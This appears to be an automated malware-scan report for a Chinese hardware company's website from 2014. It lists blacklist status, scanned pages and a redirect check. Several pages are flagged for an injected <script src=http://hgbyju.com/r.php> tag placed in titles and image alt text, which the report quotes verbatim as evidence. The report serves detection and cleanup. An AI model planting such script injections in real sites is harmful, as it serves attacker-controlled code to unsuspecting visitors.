Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yingly.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://yingly.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://yingly.com/ | 200 OK Content-Length: 1372 Content-Type: text/html | clean |
http://yingly.com/index_cn.asp | 200 OK Content-Length: 7922 Content-Type: text/html | clean |
http://yingly.com/index.asp | 200 OK Content-Length: 1372 Content-Type: text/html | clean |
http://yingly.com/en/index.asp | 200 OK Content-Length: 8477 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hgbyju.com ...[4651 bytes skipped]... th="87" border="0"> <tbody> <tr> <td style="PADDING-RIGHT: 7px; PADDING-LEFT: 7px; PADDING-BOTTOM: 2px; PADDING-TOP: 1px" valign="center" align="middle" width="116" background="images2/class_bg.gif" height="116"><a href="product_view.asp?cid=335&id=357"><img src="/uploadfile/2009102811273156787.jpg" alt="C025 Bidet </title><script src=http://hgbyju.com/r.php ></script></title><script src=http://hgbyju.com/r.php ></script>" width="116" height="106" border="0" /></a></td> </tr> </tbody> </table> </td> <td width="251" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td style="font-size:13px; font-weight:bold; padding:5px 10px;">& ...[5281 bytes skipped]... | ||
http://hgbyju.com/r.php | HTTP/1.1 302 Found Connection: close Date: Mon, 23 Jun 2014 17:58:28 GMT Location: http://ww15.hgbyju.com/r.php Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://ww15.hgbyju.com/r.php | HTTP/1.1 404 Not Found Connection: close Date: Mon, 23 Jun 2014 17:58:26 GMT Server: Tengine/1.4.2 Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.3.10 | clean |
http://ww15.hgbyju.com/?acc=0f4b1727-114a-4ef2-ac1b-1db964d84818&ref=&framerequest=1&noscript=1 | 200 OK Content-Length: 8248 Content-Type: text/html | clean |
http://www.google.com/adsense/domains/caf.js | 200 OK Content-Length: 258 Content-Type: text/javascript | clean |
http://a1.dnbizcdn.com/js/parking_caf_141_1402251.js | 200 OK Content-Length: 36278 Content-Type: application/x-javascript | clean |
http://hgbyju.com/Privacy.html | HTTP/1.1 302 Found Connection: close Date: Mon, 23 Jun 2014 17:58:31 GMT Location: http://ww15.hgbyju.com/Privacy.html Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://ww15.hgbyju.com/privacy.html | HTTP/1.1 404 Not Found Connection: close Date: Mon, 23 Jun 2014 17:58:29 GMT Server: Tengine/1.4.2 Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.3.10 | clean |
http://ww15.hgbyju.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Mon, 23 Jun 2014 17:58:30 GMT Server: Tengine/1.4.2 Vary: Accept-Encoding Content-Type: text/html X-Powered-By: PHP/5.3.10 | clean |
http://yingly.com/aboutus.asp | 200 OK Content-Length: 5046 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hgbyju.com ...[86 bytes skipped]... .org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--ÍøÒ³¹Ø¼ü´ÊÉ趨--> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <meta http-equiv="Content-Language" content="zh-CN" /> <meta content="Îå½ð" name="keywords" /> <title>ɽ¶«»ªÔÀÎå½ðÓÐÏÞ¹«Ë¾º¼ÖÝ·Ö¹«Ë¾ </title><script src=http://hgbyju.com/r.php ></script></title> <link rel="stylesheet" type="text/css" href="style/css.css" /> </head> <body> <style type="text/css"> input.smallInput{FONT-SIZE: 9pt; FONT-STYLE: normal; FONT-VARIANT: normal; FONT-WEIGHT: normal; HEIGHT: 15px; LINE-HEIGHT: normal; background-color:#FFFFFF; border:none} </style> <link rel="stylesheet" type="text/css" href="/style/css.css" /> <script languag ...[5572 bytes skipped]... | ||
http://yingly.com/news.asp | 200 OK Content-Length: 5128 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hgbyju.com ...[86 bytes skipped]... .org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--ÍøÒ³¹Ø¼ü´ÊÉ趨--> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <meta http-equiv="Content-Language" content="zh-CN" /> <meta content="Îå½ð" name="keywords" /> <title>ɽ¶«»ªÔÀÎå½ðÓÐÏÞ¹«Ë¾º¼ÖÝ·Ö¹«Ë¾ </title><script src=http://hgbyju.com/r.php ></script></title> <link rel="stylesheet" type="text/css" href="style/css.css" /> </head> <body> <style type="text/css"> input.smallInput{FONT-SIZE: 9pt; FONT-STYLE: normal; FONT-VARIANT: normal; FONT-WEIGHT: normal; HEIGHT: 15px; LINE-HEIGHT: normal; background-color:#FFFFFF; border:none} </style> <link rel="stylesheet" type="text/css" href="/style/css.css" /> <script languag ...[5788 bytes skipped]... | ||
http://yingly.com/product.asp | 200 OK Content-Length: 6713 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hgbyju.com ...[86 bytes skipped]... .org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--ÍøÒ³¹Ø¼ü´ÊÉ趨--> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <meta http-equiv="Content-Language" content="zh-CN" /> <meta content="Îå½ð" name="keywords" /> <title>ɽ¶«»ªÔÀÎå½ðÓÐÏÞ¹«Ë¾º¼ÖÝ·Ö¹«Ë¾ </title><script src=http://hgbyju.com/r.php ></script></title> <link rel="stylesheet" type="text/css" href="style/css.css" /> </head> <SCRIPT language=javascript src="style/delixi_eshion.js"></SCRIPT> <body> <style type="text/css"> input.smallInput{FONT-SIZE: 9pt; FONT-STYLE: normal; FONT-VARIANT: normal; FONT-WEIGHT: normal; HEIGHT: 15px; LINE-HEIGHT: normal; background-color:#FFFFFF; border:none} </style> <link rel="s ...[7835 bytes skipped]... | ||
http://yingly.com/style/delixi_eshion.js | 200 OK Content-Length: 711 Content-Type: application/x-javascript | clean |
http://yingly.com/lxwm.asp | 200 OK Content-Length: 5257 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hgbyju.com ...[86 bytes skipped]... .org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--ÍøÒ³¹Ø¼ü´ÊÉ趨--> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <meta http-equiv="Content-Language" content="zh-CN" /> <meta content="Îå½ð" name="keywords" /> <title>ɽ¶«»ªÔÀÎå½ðÓÐÏÞ¹«Ë¾º¼ÖÝ·Ö¹«Ë¾ </title><script src=http://hgbyju.com/r.php ></script></title> <link rel="stylesheet" type="text/css" href="style/css.css" /> </head> <body> <style type="text/css"> input.smallInput{FONT-SIZE: 9pt; FONT-STYLE: normal; FONT-VARIANT: normal; FONT-WEIGHT: normal; HEIGHT: 15px; LINE-HEIGHT: normal; background-color:#FFFFFF; border:none} </style> <link rel="stylesheet" type="text/css" href="/style/css.css" /> <script languag ...[5873 bytes skipped]... | ||
http://yingly.com/message.asp | 200 OK Content-Length: 8234 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hgbyju.com ...[86 bytes skipped]... .org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--ÍøÒ³¹Ø¼ü´ÊÉ趨--> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <meta http-equiv="Content-Language" content="zh-CN" /> <meta content="Îå½ð" name="keywords" /> <title>ɽ¶«»ªÔÀÎå½ðÓÐÏÞ¹«Ë¾º¼ÖÝ·Ö¹«Ë¾ </title><script src=http://hgbyju.com/r.php ></script></title> <link rel="stylesheet" type="text/css" href="style/css.css" /> <style type="text/css"> <!-- .style1 {color: #FF0000} --> </style> <script language="javascript"> function check(){ user=mailsend.user.value; Email=mailsend.Email.value; title=mailsend.title.value; content=mailsend.content.value; if(user==''){ alert('Ç ...[9994 bytes skipped]... | ||
http://yingly.com/product_news.asp?new=1 | 200 OK Content-Length: 6253 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hgbyju.com ...[86 bytes skipped]... .org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--ÍøÒ³¹Ø¼ü´ÊÉ趨--> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <meta http-equiv="Content-Language" content="zh-CN" /> <meta content="Îå½ð" name="keywords" /> <title>ɽ¶«»ªÔÀÎå½ðÓÐÏÞ¹«Ë¾º¼ÖÝ·Ö¹«Ë¾ </title><script src=http://hgbyju.com/r.php ></script></title> <SCRIPT language=javascript src="style/delixi_eshion.js"></SCRIPT> <link rel="stylesheet" type="text/css" href="style/css.css" /> </head> <body> <style type="text/css"> input.smallInput{FONT-SIZE: 9pt; FONT-STYLE: normal; FONT-VARIANT: normal; FONT-WEIGHT: normal; HEIGHT: 15px; LINE-HEIGHT: normal; background-color:#FFFFFF; border:none} </style> <link ...[7283 bytes skipped]... | ||
http://yingly.com/product_news.asp?new=0 | 200 OK Content-Length: 6253 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hgbyju.com ...[86 bytes skipped]... .org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--ÍøÒ³¹Ø¼ü´ÊÉ趨--> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <meta http-equiv="Content-Language" content="zh-CN" /> <meta content="Îå½ð" name="keywords" /> <title>ɽ¶«»ªÔÀÎå½ðÓÐÏÞ¹«Ë¾º¼ÖÝ·Ö¹«Ë¾ </title><script src=http://hgbyju.com/r.php ></script></title> <SCRIPT language=javascript src="style/delixi_eshion.js"></SCRIPT> <link rel="stylesheet" type="text/css" href="style/css.css" /> </head> <body> <style type="text/css"> input.smallInput{FONT-SIZE: 9pt; FONT-STYLE: normal; FONT-VARIANT: normal; FONT-WEIGHT: normal; HEIGHT: 15px; LINE-HEIGHT: normal; background-color:#FFFFFF; border:none} </style> <link ...[7283 bytes skipped]... | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yingly.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 23 Jun 2014 17:57:40 GMT
Server: Microsoft-IIS/7.0
Content-Length: 1372
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAATAAQC=NFFJPLGDOAIECNGBPBAAILEI; path=/
X-Powered-By: ASP.NET
...1372 bytes of data.
GET / HTTP/1.1
Host: yingly.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 23 Jun 2014 17:57:40 GMT
Server: Microsoft-IIS/7.0
Content-Length: 1372
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAATAAQC=NFFJPLGDOAIECNGBPBAAILEI; path=/
X-Powered-By: ASP.NET
...1372 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yingly.com
Referer: http://www.google.com/search?q=yingly.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yingly.com
Referer: http://www.google.com/search?q=yingly.com
Result:
The result is similar to the first query. There are no suspicious redirects found.